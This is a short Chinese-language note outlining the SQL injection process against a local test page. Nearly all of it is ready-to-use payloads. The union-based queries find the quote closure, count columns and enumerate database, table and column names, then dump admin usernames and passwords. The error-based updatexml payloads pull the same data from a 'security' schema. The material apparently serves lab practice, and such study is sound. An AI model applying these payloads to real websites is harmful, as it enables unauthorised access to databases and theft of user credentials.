sql注入流程

sql注入流程

联合查询：
查闭合id=1’ and 1=1
id=1’ and 1=2
查列数
http://127.0.0.1/shouke.php?id=1") order by 4 #
显示位
http://127.0.0.1/shouke.php?id=1") and 1=2 union select 1,2,3,4 #
查数据库名
http://127.0.0.1/shouke.php?id=1") and 1=2 union select 1,database(),3,4 #
查表名
http://127.0.0.1/shouke.php?id=1") and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘test’ #
查字段
http://127.0.0.1/shouke.php?id=1") and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=‘test’ and table_name = ‘admin’ #
http://127.0.0.1/shouke.php?id=1") and1=2 union select 1,group_concat(username,0x23,password),3,4 from test.admin #

http://cb.drops.wiki

www.anquan.us

报错注入：
得到库名?id=1’ and updatexml(1,concat(0x23,database(),0x23),1) %23
得到表名?id=1’ and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x23),1) %23
得到列名?id=1’ and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name =‘users’),0x23),1) %23
得到账号?id=1’ and updatexml(1,concat(0x23,(select concat(username,0x23,password) from security.users limit 7,1),0x23),1) %23